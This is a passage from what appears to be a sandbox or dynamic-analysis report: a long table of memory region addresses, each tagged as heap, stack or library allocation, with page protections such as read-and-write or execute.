|
page read and write
|
||
2357DF0A000
|
heap
|
page read and write
|
||
23510211000
|
trusted library allocation
|
page read and write
|
||
7FFE16830000
|
trusted library allocation
|
page read and write
|
||
1BDC96B5000
|
heap
|
page read and write
|
||
7FFE165D0000
|
trusted library allocation
|
page execute and read and write
|
||
71DD77E000
|
stack
|
page read and write
|
||
B6DFC7E000
|
stack
|
page read and write
|
||
7FFE16870000
|
trusted library allocation
|
page read and write
|
||
22AD3440000
|
trusted library allocation
|
page read and write
|
||
15FE7DD0000
|
heap
|
page read and write
|
||
7FFE1650D000
|
trusted library allocation
|
page execute and read and write
|
||
2BDAC148000
|
trusted library allocation
|
page read and write
|
||
D44CF78000
|
stack
|
page read and write
|
||
2646DB16000
|
heap
|
page read and write
|
||
220231B9000
|
trusted library allocation
|
page read and write
|
||
25E9C0A0000
|
heap
|
page read and write
|
||
208B2960000
|
heap
|
page read and write
|
||
7B7E57E000
|
stack
|
page read and write
|
||
7FFE166C2000
|
trusted library allocation
|
page read and write
|
||
1B944000
|
heap
|
page read and write
|
||
7B7ECBC000
|
stack
|
page read and write
|
||
1BDC9545000
|
heap
|
page read and write
|
||
7FFE16814000
|
trusted library allocation
|
page read and write
|
||
2645693B000
|
trusted library allocation
|
page read and write
|
||
2BDA878C000
|
heap
|
page read and write
|
||
7FFE16520000
|
trusted library allocation
|
page read and write
|
||
15FEA7FF000
|
heap
|
page read and write
|
||
208B2A40000
|
heap
|
page read and write
|
||
7FFE166B0000
|
trusted library allocation
|
page read and write
|
||
15FE7DD0000
|
heap
|
page read and write
|
||
B6E0DCB000
|
stack
|
page read and write
|
||
22AEA9DA000
|
heap
|
page read and write
|
||
2646DCAC000
|
heap
|
page read and write
|
||
2BDABE5E000
|
trusted library allocation
|
page read and write
|
||
23500340000
|
trusted library allocation
|
page read and write
|
||
B6E0D4F000
|
stack
|
page read and write
|
||
7FFE167E0000
|
trusted library allocation
|
page read and write
|
||
26455C80000
|
trusted library allocation
|
page read and write
|
||
2860000
|
heap
|
page read and write
|
||
2DC21C20000
|
heap
|
page read and write
|
||
22AEA68B000
|
heap
|
page read and write
|
||
25E9C290000
|
trusted library allocation
|
page read and write
|
||
235186ED000
|
heap
|
page read and write
|
||
7FFE165C0000
|
trusted library allocation
|
page execute and read and write
|
||
22AD3948000
|
trusted library allocation
|
page read and write
|
||
22AE2300000
|
trusted library allocation
|
page read and write
|
||
7FFE168A0000
|
trusted library allocation
|
page read and write
|
||
26465661000
|
trusted library allocation
|
page read and write
|
||
7FFE167E0000
|
trusted library allocation
|
page read and write
|
||
7FFE16880000
|
trusted library allocation
|
page read and write
|
||
4F6B77F000
|
stack
|
page read and write
|
||
2BDAA140000
|
heap
|
page execute and read and write
|
||
15FE7DCF000
|
heap
|
page read and write
|
||
264556CA000
|
trusted library allocation
|
page read and write
|
||
15FE7DE6000
|
heap
|
page read and write
|
||
23500326000
|
trusted library allocation
|
page read and write
|
||
7FFE16544000
|
trusted library allocation
|
page read and write
|
||
15FE7E90000
|
heap
|
page read and write
|
||
2203987F000
|
heap
|
page read and write
|
||
1B4C0000
|
heap
|
page execute and read and write
|
||
BE4000
|
heap
|
page read and write
|
||
7FFE16550000
|
trusted library allocation
|
page read and write
|
||
7FFE167F0000
|
trusted library allocation
|
page read and write
|
||
22021610000
|
heap
|
page execute and read and write
|
||
22021115000
|
heap
|
page read and write
|
||
D44DC8E000
|
stack
|
page read and write
|
||
220210D0000
|
heap
|
page execute and read and write
|
||
26455651000
|
trusted library allocation
|
page read and write
|
||
7FFE1651B000
|
trusted library allocation
|
page read and write
|
||
25E9A755000
|
heap
|
page read and write
|
||
7FFE167C0000
|
trusted library allocation
|
page read and write
|
||
B6DFE3E000
|
stack
|
page read and write
|
||
220398BB000
|
heap
|
page read and write
|
||
7FFE167F0000
|
trusted library allocation
|
page read and write
|
||
2350056E000
|
trusted library allocation
|
page read and write
|
||
22039620000
|
heap
|
page read and write
|
||
7FFE16700000
|
trusted library allocation
|
page execute and read and write
|
||
2201F56D000
|
heap
|
page read and write
|
||
264553D0000
|
trusted library allocation
|
page read and write
|
||
2BDBA501000
|
trusted library allocation
|
page read and write
|
||
15FE7D70000
|
heap
|
page read and write
|
||
2BDAA0B0000
|
heap
|
page readonly
|
||
7FFE16840000
|
trusted library allocation
|
page read and write
|
||
25E9A670000
|
heap
|
page read and write
|
||
2BDC2710000
|
heap
|
page execute and read and write
|
||
25EAC280000
|
trusted library allocation
|
page read and write
|
||
2BDC2716000
|
heap
|
page execute and read and write
|
||
25E9A49F000
|
heap
|
page read and write
|
||
15FE802D000
|
heap
|
page read and write
|
||
2357F884000
|
heap
|
page read and write
|
||
15FEA245000
|
heap
|
page read and write
|
||
2BDBA6B2000
|
trusted library allocation
|
page read and write
|
||
7FFE1653D000
|
trusted library allocation
|
page execute and read and write
|
||
235186B0000
|
heap
|
page read and write
|
||
22AD4035000
|
trusted library allocation
|
page read and write
|
||
7FFE16730000
|
trusted library allocation
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
B7C000
|
heap
|
page read and write
|
||
7FFE165BC000
|
trusted library allocation
|
page execute and read and write
|
||
15FEA6F1000
|
heap
|
page read and write
|
||
1BDC9559000
|
heap
|
page read and write
|
||
23500060000
|
heap
|
page readonly
|
||
235005FB000
|
trusted library allocation
|
page read and write
|
||
1BDC953A000
|
heap
|
page read and write
|
||
2357DE9A000
|
heap
|
page read and write
|
||
7FFE165E6000
|
trusted library allocation
|
page execute and read and write
|
||
2357DE4E000
|
heap
|
page read and write
|
||
264559FE000
|
trusted library allocation
|
page read and write
|
||
26455A1A000
|
trusted library allocation
|
page read and write
|
||
2646DA66000
|
heap
|
page execute and read and write
|
||
1E92CAE5000
|
heap
|
page read and write
|
||
22AEA67F000
|
heap
|
page read and write
|
||
25E9A680000
|
heap
|
page read and write
|
||
88E61FF000
|
stack
|
page read and write
|
||
4F6B8BE000
|
stack
|
page read and write
|
||
B6E003E000
|
stack
|
page read and write
|
||
2201F7B0000
|
trusted library allocation
|
page read and write
|
||
22AD0643000
|
heap
|
page read and write
|
||
B6E0E4C000
|
stack
|
page read and write
|
||
7FFE16523000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE165B6000
|
trusted library allocation
|
page read and write
|
||
15FEA245000
|
heap
|
page read and write
|
||
D44CA7E000
|
stack
|
page read and write
|
||
22AEA830000
|
heap
|
page read and write
|
||
25E9C2D8000
|
trusted library allocation
|
page read and write
|
||
2BDA8650000
|
heap
|
page read and write
|
||
25EB46A7000
|
heap
|
page read and write
|
||
25E9C180000
|
heap
|
page execute and read and write
|
||
7F5000
|
heap
|
page read and write
|
||
71DE68E000
|
stack
|
page read and write
|
||
7FFE166A9000
|
trusted library allocation
|
page read and write
|
||
C0CF4BC000
|
stack
|
page read and write
|
||
22021007000
|
heap
|
page execute and read and write
|
||
7FFE16820000
|
trusted library allocation
|
page read and write
|
||
7FFE16800000
|
trusted library allocation
|
page read and write
|
||
51401FF000
|
stack
|
page read and write
|
||
7FFE16860000
|
trusted library allocation
|
page read and write
|
||
2201F7DB000
|
heap
|
page read and write
|
||
7FFE168B0000
|
trusted library allocation
|
page read and write
|
||
22AEA9D8000
|
heap
|
page read and write
|
||
7FFE166DA000
|
trusted library allocation
|
page read and write
|
||
2201F559000
|
heap
|
page read and write
|
||
12AE1000
|
trusted library allocation
|
page read and write
|
||
22AD2376000
|
trusted library allocation
|
page read and write
|
||
C0CEDFE000
|
stack
|
page read and write
|
||
2BDC27B6000
|
heap
|
page read and write
|
||
2357DE95000
|
heap
|
page read and write
|
||
C0CED7F000
|
stack
|
page read and write
|
||
7FFE166A2000
|
trusted library allocation
|
page read and write
|
||
22AD0865000
|
heap
|
page read and write
|
||
2357DF07000
|
heap
|
page read and write
|
||
15FEA875000
|
heap
|
page read and write
|
||
264656BF000
|
trusted library allocation
|
page read and write
|
||
1BDC96B9000
|
heap
|
page read and write
|
||
7FFE16840000
|
trusted library allocation
|
page read and write
|
||
2BDC2D10000
|
heap
|
page read and write
|
||
15FE7DBE000
|
heap
|
page read and write
|
||
2350032F000
|
trusted library allocation
|
page read and write
|
||
22AD0760000
|
trusted library allocation
|
page read and write
|
||
DE0000
|
trusted library allocation
|
page read and write
|
||
26456C82000
|
trusted library allocation
|
page read and write
|
||
26453B82000
|
heap
|
page read and write
|
||
7FFE16740000
|
trusted library allocation
|
page read and write
|
||
D44CD7D000
|
stack
|
page read and write
|
||
264572D5000
|
trusted library allocation
|
page read and write
|
||
7FFE16750000
|
trusted library allocation
|
page read and write
|
||
7FFE16770000
|
trusted library allocation
|
page read and write
|
||
18E0A7A0000
|
heap
|
page read and write
|
||
26453AA9000
|
heap
|
page read and write
|
||
1BDC95B6000
|
heap
|
page read and write
|
||
22AD0684000
|
heap
|
page read and write
|
||
2BDAC07F000
|
trusted library allocation
|
page read and write
|
||
22AD2227000
|
heap
|
page execute and read and write
|
||
7FFE16730000
|
trusted library allocation
|
page read and write
|
||
B6E0C0E000
|
stack
|
page read and write
|
||
7FFE16870000
|
trusted library allocation
|
page read and write
|
||
1B905000
|
heap
|
page read and write
|
||
264572D9000
|
trusted library allocation
|
page read and write
|
||
22AD3950000
|
trusted library allocation
|
page read and write
|
||
2DC21C50000
|
heap
|
page read and write
|
||
B6E013E000
|
stack
|
page read and write
|
||
513FD4A000
|
stack
|
page read and write
|
||
18E0A790000
|
heap
|
page read and write
|
||
2DC21C5B000
|
heap
|
page read and write
|
||
B6DFDF9000
|
stack
|
page read and write
|
||
2BDC2756000
|
heap
|
page read and write
|
||
22023142000
|
trusted library allocation
|
page read and write
|
||
7FFE16760000
|
trusted library allocation
|
page read and write
|
||
23500050000
|
heap
|
page execute and read and write
|
||
C0CEF7D000
|
stack
|
page read and write
|
||
26455360000
|
trusted library allocation
|
page read and write
|
||
1BDC9586000
|
heap
|
page read and write
|
||
7FFE165B6000
|
trusted library allocation
|
page read and write
|
||
25E9A4EB000
|
heap
|
page read and write
|
||
7FFE16770000
|
trusted library allocation
|
page read and write
|
||
7FFE1650D000
|
trusted library allocation
|
page execute and read and write
|
||
7B7EB3E000
|
stack
|
page read and write
|
||
25E9C190000
|
heap
|
page execute and read and write
|
||
22020FF0000
|
trusted library allocation
|
page read and write
|
||
7FFE167E0000
|
trusted library allocation
|
page read and write
|
||
25E9C271000
|
trusted library allocation
|
page read and write
|
||
23500876000
|
trusted library allocation
|
page read and write
|
||
26455B23000
|
trusted library allocation
|
page read and write
|
||
1BDC9595000
|
heap
|
page read and write
|
||
2BDAA1B0000
|
heap
|
page read and write
|
||
22AD27B1000
|
trusted library allocation
|
page read and write
|
||
22AD22F1000
|
trusted library allocation
|
page read and write
|
||
7FFE16710000
|
trusted library allocation
|
page read and write
|
||
25E9C39D000
|
trusted library allocation
|
page read and write
|
||
7FFE16534000
|
trusted library allocation
|
page read and write
|
||
51400FF000
|
stack
|
page read and write
|
||
1BDCBE62000
|
heap
|
page read and write
|
||
1E92CA00000
|
heap
|
page read and write
|
||
D44C7FE000
|
stack
|
page read and write
|
||
25EB47B0000
|
heap
|
page read and write
|
||
7FFE16524000
|
trusted library allocation
|
page read and write
|
||
BC8000
|
heap
|
page read and write
|
||
26455340000
|
trusted library allocation
|
page read and write
|
||
D44DD0F000
|
stack
|
page read and write
|
||
15FE7D99000
|
heap
|
page read and write
|
||
22AD06E9000
|
heap
|
page read and write
|
||
25E9A430000
|
heap
|
page read and write
|
||
C0CF238000
|
stack
|
page read and write
|
||
7FFE166C9000
|
trusted library allocation
|
page read and write
|
||
7FFE16740000
|
trusted library allocation
|
page read and write
|
||
2BDC2840000
|
heap
|
page read and write
|
||
1B997000
|
heap
|
page read and write
|
||
2646DA60000
|
heap
|
page execute and read and write
|
||
22AD269E000
|
trusted library allocation
|
page read and write
|
||
22022F9D000
|
trusted library allocation
|
page read and write
|
||
7FFE16810000
|
trusted library allocation
|
page read and write
|
||
235003E6000
|
trusted library allocation
|
page read and write
|
||
23500020000
|
trusted library allocation
|
page read and write
|
||
7FFE16520000
|
trusted library allocation
|
page read and write
|
||
7FFE16880000
|
trusted library allocation
|
page read and write
|
||
7FFE167E0000
|
trusted library allocation
|
page read and write
|
||
1AE67000
|
heap
|
page read and write
|
||
25E9A420000
|
heap
|
page read and write
|
||
235186A0000
|
heap
|
page execute and read and write
|
||
15FEA6F0000
|
heap
|
page read and write
|
||
E7EBB7F000
|
unkown
|
page read and write
|
||
26453AE3000
|
heap
|
page read and write
|
||
51404FF000
|
stack
|
page read and write
|
||
22AD2175000
|
heap
|
page read and write
|
||
2201F54D000
|
heap
|
page read and write
|
||
C0CEC72000
|
stack
|
page read and write
|
||
4F6B47F000
|
stack
|
page read and write
|
||
E00000
|
trusted library allocation
|
page read and write
|
||
2900000
|
heap
|
page read and write
|
||
7FFE166A9000
|
trusted library allocation
|
page read and write
|
||
7B7E67D000
|
stack
|
page read and write
|
||
B6DFFB9000
|
stack
|
page read and write
|
||
7FFE16720000
|
trusted library allocation
|
page read and write
|
||
D44D07E000
|
stack
|
page read and write
|
||
2BDBA511000
|
trusted library allocation
|
page read and write
|
||
7FFE16630000
|
trusted library allocation
|
page execute and read and write
|
||
23510220000
|
trusted library allocation
|
page read and write
|
||
22AD063D000
|
heap
|
page read and write
|
||
E80000
|
heap
|
page read and write
|
||
22021621000
|
trusted library allocation
|
page read and write
|
||
1BDC9586000
|
heap
|
page read and write
|
||
23518727000
|
heap
|
page read and write
|
||
4F6BBBF000
|
stack
|
page read and write
|
||
6C15E7E000
|
stack
|
page read and write
|
||
D44CE77000
|
stack
|
page read and write
|
||
22AE22F1000
|
trusted library allocation
|
page read and write
|
||
7FFE16820000
|
trusted library allocation
|
page read and write
|
||
22AD063F000
|
heap
|
page read and write
|
||
7FFE16790000
|
trusted library allocation
|
page read and write
|
||
26465939000
|
trusted library allocation
|
page read and write
|
||
25E9A6B0000
|
trusted library allocation
|
page read and write
|
||
7FFE16510000
|
trusted library allocation
|
page read and write
|
||
15FEA6F2000
|
heap
|
page read and write
|
||
2BDC2930000
|
heap
|
page read and write
|
||
22AD21D0000
|
heap
|
page execute and read and write
|
||
2646DB90000
|
heap
|
page read and write
|
||
88E68FF000
|
stack
|
page read and write
|
||
4F6B7FE000
|
stack
|
page read and write
|
||
18E0A820000
|
heap
|
page read and write
|
||
88E67FE000
|
stack
|
page read and write
|
||
7FFE16514000
|
trusted library allocation
|
page read and write
|
||
2BDA8850000
|
heap
|
page read and write
|
||
7FFE16780000
|
trusted library allocation
|
page read and write
|
||
7FFE16740000
|
trusted library allocation
|
page read and write
|
||
2BDA876E000
|
heap
|
page read and write
|
||
7FFE167A0000
|
trusted library allocation
|
page read and write
|
||
25E9A532000
|
heap
|
page read and write
|
||
2201F750000
|
heap
|
page read and write
|
||
2BDA87B4000
|
heap
|
page read and write
|
||
15FE802A000
|
heap
|
page read and write
|
||
4F6B1D3000
|
stack
|
page read and write
|
||
C0CECFE000
|
stack
|
page read and write
|
||
18E0A829000
|
heap
|
page read and write
|
||
15FE7E70000
|
heap
|
page read and write
|
||
22039829000
|
heap
|
page read and write
|
||
1AB10000
|
trusted library allocation
|
page read and write
|
||
235002F5000
|
trusted library allocation
|
page read and write
|
||
1B06D000
|
stack
|
page read and write
|
||
2DC21C5D000
|
heap
|
page read and write
|
||
2357F880000
|
heap
|
page read and write
|
||
235002FF000
|
trusted library allocation
|
page read and write
|
||
7FFE166B4000
|
trusted library allocation
|
page read and write
|
||
7FFE16504000
|
trusted library allocation
|
page read and write
|
||
25E9C649000
|
trusted library allocation
|
page read and write
|
||
E7EBEFE000
|
stack
|
page read and write
|
||
2BDAA0F0000
|
trusted library allocation
|
page read and write
|
||
22AD22EC000
|
heap
|
page read and write
|
||
2350032C000
|
trusted library allocation
|
page read and write
|
||
25EB4600000
|
heap
|
page read and write
|
||
22021000000
|
heap
|
page execute and read and write
|
||
25E9C187000
|
heap
|
page execute and read and write
|
||
26453A50000
|
heap
|
page read and write
|
||
1BEBB000
|
stack
|
page read and write
|
||
2203190A000
|
trusted library allocation
|
page read and write
|
||
7FFE16830000
|
trusted library allocation
|
page read and write
|
||
C0CF079000
|
stack
|
page read and write
|
||
1E92CAF0000
|
heap
|
page read and write
|
||
C0D004D000
|
stack
|
page read and write
|
||
25EB45C4000
|
heap
|
page read and write
|
||
B6DFEB7000
|
stack
|
page read and write
|
||
2357DE1A000
|
heap
|
page read and write
|
||
2BDAB69B000
|
trusted library allocation
|
page read and write
|
||
22AD0609000
|
heap
|
page read and write
|
||
15FE7DCB000
|
heap
|
page read and write
|
||
7FFE1654B000
|
trusted library allocation
|
page execute and read and write
|
||
2350027F000
|
trusted library allocation
|
page read and write
|
||
7FFE165F0000
|
trusted library allocation
|
page execute and read and write
|
||
1BDCBF69000
|
heap
|
page read and write
|
||
7FFE16503000
|
trusted library allocation
|
page execute and read and write
|
||
22AD2A40000
|
trusted library allocation
|
page read and write
|
||
2BDC2500000
|
heap
|
page read and write
|
||
22AD22E0000
|
heap
|
page read and write
|
||
1BDC9586000
|
heap
|
page read and write
|
||
7FFE16800000
|
trusted library allocation
|
page read and write
|
||
B25000
|
heap
|
page read and write
|
||
7FFE16606000
|
trusted library allocation
|
page execute and read and write
|
||
1BDCBE61000
|
heap
|
page read and write
|
||
23500343000
|
trusted library allocation
|
page read and write
|
||
22022253000
|
trusted library allocation
|
page read and write
|
||
AF4000
|
stack
|
page read and write
|
||
D44D17B000
|
stack
|
page read and write
|
||
7FFE165EC000
|
trusted library allocation
|
page execute and read and write
|
||
25EB466C000
|
heap
|
page read and write
|
||
7FFE16730000
|
trusted library allocation
|
page read and write
|
||
1BDCB9BC000
|
heap
|
page read and write
|
||
25E9A4A7000
|
heap
|
page read and write
|
||
235186EF000
|
heap
|
page read and write
|
||
2BDA8830000
|
heap
|
page read and write
|
||
B3B000
|
heap
|
page read and write
|
||
7FFE16540000
|
trusted library allocation
|
page read and write
|
||
1BDC9593000
|
heap
|
page read and write
|
||
7FFE1651B000
|
trusted library allocation
|
page read and write
|
||
1BDCB37A000
|
heap
|
page read and write
|
||
7FFE16820000
|
trusted library allocation
|
page read and write
|
||
7FFE16513000
|
trusted library allocation
|
page execute and read and write
|
||
208B2ABB000
|
heap
|
page read and write
|
||
3B6CBFF000
|
stack
|
page read and write
|
||
25E9C674000
|
trusted library allocation
|
page read and write
|
||
7FFE1656C000
|
trusted library allocation
|
page execute and read and write
|
||
23518BE0000
|
heap
|
page read and write
|
||
7FFE16850000
|
trusted library allocation
|
page read and write
|
||
7FFE166B1000
|
trusted library allocation
|
page read and write
|
||
25E9C260000
|
heap
|
page execute and read and write
|
||
7FFE16524000
|
trusted library allocation
|
page read and write
|
||
7FFE166BA000
|
trusted library allocation
|
page read and write
|
||
235005EA000
|
trusted library allocation
|
page read and write
|
||
7FFE166B2000
|
trusted library allocation
|
page read and write
|
||
1BDC94A0000
|
heap
|
page read and write
|
||
25E9C3A6000
|
trusted library allocation
|
page read and write
|
||
71DD47E000
|
stack
|
page read and write
|
||
7FFE1681F000
|
trusted library allocation
|
page read and write
|
||
1B8D0000
|
heap
|
page read and write
|
||
2BDAC144000
|
trusted library allocation
|
page read and write
|
||
B52000
|
heap
|
page read and write
|
||
22AD04E0000
|
heap
|
page read and write
|
||
2AD0000
|
heap
|
page execute and read and write
|
||
1B917000
|
heap
|
page read and write
|
||
88E64FF000
|
stack
|
page read and write
|
||
4F6B6FE000
|
stack
|
page read and write
|
||
B4F000
|
heap
|
page read and write
|
||
7FFE1654B000
|
trusted library allocation
|
page read and write
|
||
E7EBE7E000
|
stack
|
page read and write
|
||
15FE7DC8000
|
heap
|
page read and write
|
||
26455490000
|
heap
|
page read and write
|
||
D44CFFE000
|
stack
|
page read and write
|
||
7FFE16830000
|
trusted library allocation
|
page read and write
|
||
22AD0720000
|
heap
|
page read and write
|
||
C0D00CE000
|
stack
|
page read and write
|
||
7B7E8BF000
|
stack
|
page read and write
|
||
2BDABE9A000
|
trusted library allocation
|
page read and write
|
||
2646DB1C000
|
heap
|
page read and write
|
||
7FFE166F0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE166D1000
|
trusted library allocation
|
page read and write
|
||
25E9C392000
|
trusted library allocation
|
page read and write
|
||
2BDAB132000
|
trusted library allocation
|
page read and write
|
||
22AD27FF000
|
trusted library allocation
|
page read and write
|
||
235186A7000
|
heap
|
page execute and read and write
|
||
1B98F000
|
heap
|
page read and write
|
||
7FFE165F6000
|
trusted library allocation
|
page execute and read and write
|
||
E85000
|
heap
|
page read and write
|
||
25EAC271000
|
trusted library allocation
|
page read and write
|
||
7FFE16840000
|
trusted library allocation
|
page read and write
|
||
15FE9F23000
|
heap
|
page read and write
|
||
15FE7E17000
|
heap
|
page read and write
|
||
2BDABE62000
|
trusted library allocation
|
page read and write
|
||
22AD0790000
|
heap
|
page readonly
|
||
25E9A4AD000
|
heap
|
page read and write
|
||
26453B47000
|
heap
|
page read and write
|
||
D44DD8C000
|
stack
|
page read and write
|
||
7FFE16720000
|
trusted library allocation
|
page read and write
|
||
7FFE166B9000
|
trusted library allocation
|
page read and write
|
||
220317D3000
|
trusted library allocation
|
page read and write
|
||
4F6B5FD000
|
stack
|
page read and write
|
||
23500374000
|
trusted library allocation
|
page read and write
|
||
6D0000
|
unkown
|
page readonly
|
||
25E9C8D9000
|
trusted library allocation
|
page read and write
|
||
2BDC2720000
|
heap
|
page read and write
|
||
B6DFB7E000
|
stack
|
page read and write
|
||
C0CF43B000
|
stack
|
page read and write
|
||
220216AB000
|
trusted library allocation
|
page read and write
|
||
7FFE1653D000
|
trusted library allocation
|
page execute and read and write
|
||
71DD67F000
|
stack
|
page read and write
|
||
7FFE1651B000
|
trusted library allocation
|
page read and write
|
||
22AEA750000
|
heap
|
page read and write
|
||
220396F1000
|
heap
|
page read and write
|
||
71DD57E000
|
stack
|
page read and write
|
||
C0CF1BC000
|
stack
|
page read and write
|
||
2351023B000
|
trusted library allocation
|
page read and write
|
||
23518680000
|
heap
|
page execute and read and write
|
||
7FFE166C0000
|
trusted library allocation
|
page execute and read and write
|
||
1BDCB372000
|
heap
|
page read and write
|
||
25E9C389000
|
trusted library allocation
|
page read and write
|
||
7FFE16740000
|
trusted library allocation
|
page read and write
|
||
235001F0000
|
trusted library allocation
|
page read and write
|
||
2350036C000
|
trusted library allocation
|
page read and write
|
||
71DE5CE000
|
stack
|
page read and write
|
||
22AD26AC000
|
trusted library allocation
|
page read and write
|
||
7FFE16504000
|
trusted library allocation
|
page read and write
|
||
1B4AA000
|
stack
|
page read and write
|
||
2201F595000
|
heap
|
page read and write
|
||
2BDA88B0000
|
heap
|
page read and write
|
||
7FFE165BC000
|
trusted library allocation
|
page execute and read and write
|
||
2D09000
|
trusted library allocation
|
page read and write
|
||
7FFE16810000
|
trusted library allocation
|
page read and write
|
||
15FE7DE6000
|
heap
|
page read and write
|
||
1B97B000
|
heap
|
page read and write
|
||
22031621000
|
trusted library allocation
|
page read and write
|
||
7FFE16790000
|
trusted library allocation
|
page read and write
|
||
2BDAA732000
|
trusted library allocation
|
page read and write
|
||
7FFE166F0000
|
trusted library allocation
|
page execute and read and write
|
||
C0CEE7E000
|
stack
|
page read and write
|
||
2357DE55000
|
heap
|
page read and write
|
||
2BDC275B000
|
heap
|
page read and write
|
||
2201F790000
|
trusted library allocation
|
page read and write
|
||
2357DE10000
|
heap
|
page read and write
|
||
2BDC26F0000
|
heap
|
page execute and read and write
|
||
235002AB000
|
trusted library allocation
|
page read and write
|
||
2351025B000
|
trusted library allocation
|
page read and write
|
||
7FFE167B0000
|
trusted library allocation
|
page read and write
|
||
88E69FC000
|
stack
|
page read and write
|
||
C0CFFCF000
|
stack
|
page read and write
|
||
1BDC9538000
|
heap
|
page read and write
|
||
22022FB0000
|
trusted library allocation
|
page read and write
|
||
7B7EC3E000
|
stack
|
page read and write
|
||
7FFE166C0000
|
trusted library allocation
|
page read and write
|
||
22039630000
|
heap
|
page read and write
|
||
22AD2170000
|
heap
|
page read and write
|
||
D44CC7E000
|
stack
|
page read and write
|
||
25E9A6E0000
|
heap
|
page readonly
|
||
B6E023B000
|
stack
|
page read and write
|
||
2BDC273C000
|
heap
|
page read and write
|
||
2830000
|
heap
|
page read and write
|
||
22021853000
|
trusted library allocation
|
page read and write
|
||
7FFE167A7000
|
trusted library allocation
|
page read and write
|
||
7B7E93E000
|
stack
|
page read and write
|
||
7FFE166E1000
|
trusted library allocation
|
page read and write
|
||
7FFE1652D000
|
trusted library allocation
|
page execute and read and write
|
||
15FE8029000
|
heap
|
page read and write
|
||
4F6BC3B000
|
stack
|
page read and write
|
||
7FFE16720000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE166D2000
|
trusted library allocation
|
page read and write
|
||
7FFE16620000
|
trusted library allocation
|
page execute and read and write
|
||
2DC21C00000
|
heap
|
page read and write
|
||
7FFE166E0000
|
trusted library allocation
|
page execute and read and write
|
||
71DD97E000
|
stack
|
page read and write
|
||
7FFE16702000
|
trusted library allocation
|
page read and write
|
||
1BDC9568000
|
heap
|
page read and write
|
||
7FFE167F0000
|
trusted library allocation
|
page read and write
|
||
7FFE16750000
|
trusted library allocation
|
page read and write
|
||
26453B7C000
|
heap
|
page read and write
|
||
B6E0C8D000
|
stack
|
page read and write
|
||
22031690000
|
trusted library allocation
|
page read and write
|
||
2A0F000
|
stack
|
page read and write
|
||
1BDC955D000
|
heap
|
page read and write
|
||
7FFE168B0000
|
trusted library allocation
|
page read and write
|
||
7FFE16502000
|
trusted library allocation
|
page read and write
|
||
22AEA730000
|
heap
|
page read and write
|
||
25E9C38C000
|
trusted library allocation
|
page read and write
|
||
2BDAC009000
|
trusted library allocation
|
page read and write
|
||
22AD3ADF000
|
trusted library allocation
|
page read and write
|
||
22AD2220000
|
heap
|
page execute and read and write
|
||
2350037C000
|
trusted library allocation
|
page read and write
|
||
22AD26BD000
|
trusted library allocation
|
page read and write
|
||
7FFE167C0000
|
trusted library allocation
|
page read and write
|
||
7FFE16730000
|
trusted library allocation
|
page read and write
|
||
C0CFF0D000
|
stack
|
page read and write
|
||
7FFE165B0000
|
trusted library allocation
|
page read and write
|
||
7B7E4FF000
|
stack
|
page read and write
|
||
7FFE16532000
|
trusted library allocation
|
page read and write
|
||
1BDC953B000
|
heap
|
page read and write
|
||
22022F7E000
|
trusted library allocation
|
page read and write
|
||
220398AD000
|
heap
|
page read and write
|
||
26455350000
|
heap
|
page readonly
|
||
D44D1FB000
|
stack
|
page read and write
|
||
4F6B83F000
|
stack
|
page read and write
|
||
2350033D000
|
trusted library allocation
|
page read and write
|
||
23500229000
|
trusted library allocation
|
page read and write
|
||
7FFE16820000
|
trusted library allocation
|
page read and write
|
||
2645720F000
|
trusted library allocation
|
page read and write
|
||
7FFE16840000
|
trusted library allocation
|
page read and write
|
||
23500329000
|
trusted library allocation
|
page read and write
|
||
2357DCC0000
|
heap
|
page read and write
|
||
7FFE16750000
|
trusted library allocation
|
page read and write
|
||
71DDAFE000
|
stack
|
page read and write
|
||
15FE9C06000
|
heap
|
page read and write
|
||
220398B2000
|
heap
|
page read and write
|
||
22AEA950000
|
heap
|
page read and write
|
||
790000
|
heap
|
page read and write
|
||
22AD2801000
|
trusted library allocation
|
page read and write
|
||
22022FAC000
|
trusted library allocation
|
page read and write
|
||
7FFE167D0000
|
trusted library allocation
|
page read and write
|
||
7FFE167A0000
|
trusted library allocation
|
page read and write
|
||
51406FE000
|
stack
|
page read and write
|
||
2A4E000
|
stack
|
page read and write
|
||
7FFE165C0000
|
trusted library allocation
|
page execute and read and write
|
||
22AD0810000
|
trusted library allocation
|
page read and write
|
||
7FFE1651D000
|
trusted library allocation
|
page execute and read and write
|
||
7DF48D3C0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE16870000
|
trusted library allocation
|
page read and write
|
||
B82000
|
heap
|
page read and write
|
||
2BDA88B5000
|
heap
|
page read and write
|
||
7FFE166E0000
|
trusted library allocation
|
page execute and read and write
|
||
22AD2140000
|
heap
|
page execute and read and write
|
||
2201F610000
|
heap
|
page read and write
|
||
7FFE166E2000
|
trusted library allocation
|
page read and write
|
||
26453B25000
|
heap
|
page read and write
|
||
2BDAB97F000
|
trusted library allocation
|
page read and write
|
||
1BDC956D000
|
heap
|
page read and write
|
||
235186B5000
|
heap
|
page read and write
|
||
26453AE9000
|
heap
|
page read and write
|
||
220232CF000
|
trusted library allocation
|
page read and write
|
||
7FFE16880000
|
trusted library allocation
|
page read and write
|
||
71DD4FE000
|
stack
|
page read and write
|
||
7FFE165E0000
|
trusted library allocation
|
page execute and read and write
|
||
B6DFAFE000
|
stack
|
page read and write
|
||
4F6B4FF000
|
stack
|
page read and write
|
||
26455E33000
|
trusted library allocation
|
page read and write
|
||
26455495000
|
heap
|
page read and write
|
||
25E9C792000
|
trusted library allocation
|
page read and write
|
||
7FFE16830000
|
trusted library allocation
|
page read and write
|
||
26455C77000
|
trusted library allocation
|
page read and write
|
||
22022A9C000
|
trusted library allocation
|
page read and write
|
||
26456CAC000
|
trusted library allocation
|
page read and write
|
||
7FFE166F0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE165D6000
|
trusted library allocation
|
page read and write
|
||
7FFE16740000
|
trusted library allocation
|
page read and write
|
||
7FFE166C0000
|
trusted library allocation
|
page read and write
|
||
25EB4690000
|
heap
|
page read and write
|
||
B6DFCFE000
|
stack
|
page read and write
|
||
22AEA96C000
|
heap
|
page read and write
|
||
25E9A674000
|
heap
|
page read and write
|
||
26453AFD000
|
heap
|
page read and write
|
||
2BDC27C6000
|
heap
|
page read and write
|
||
2350025A000
|
trusted library allocation
|
page read and write
|
||
26453AC7000
|
heap
|
page read and write
|
||
23500040000
|
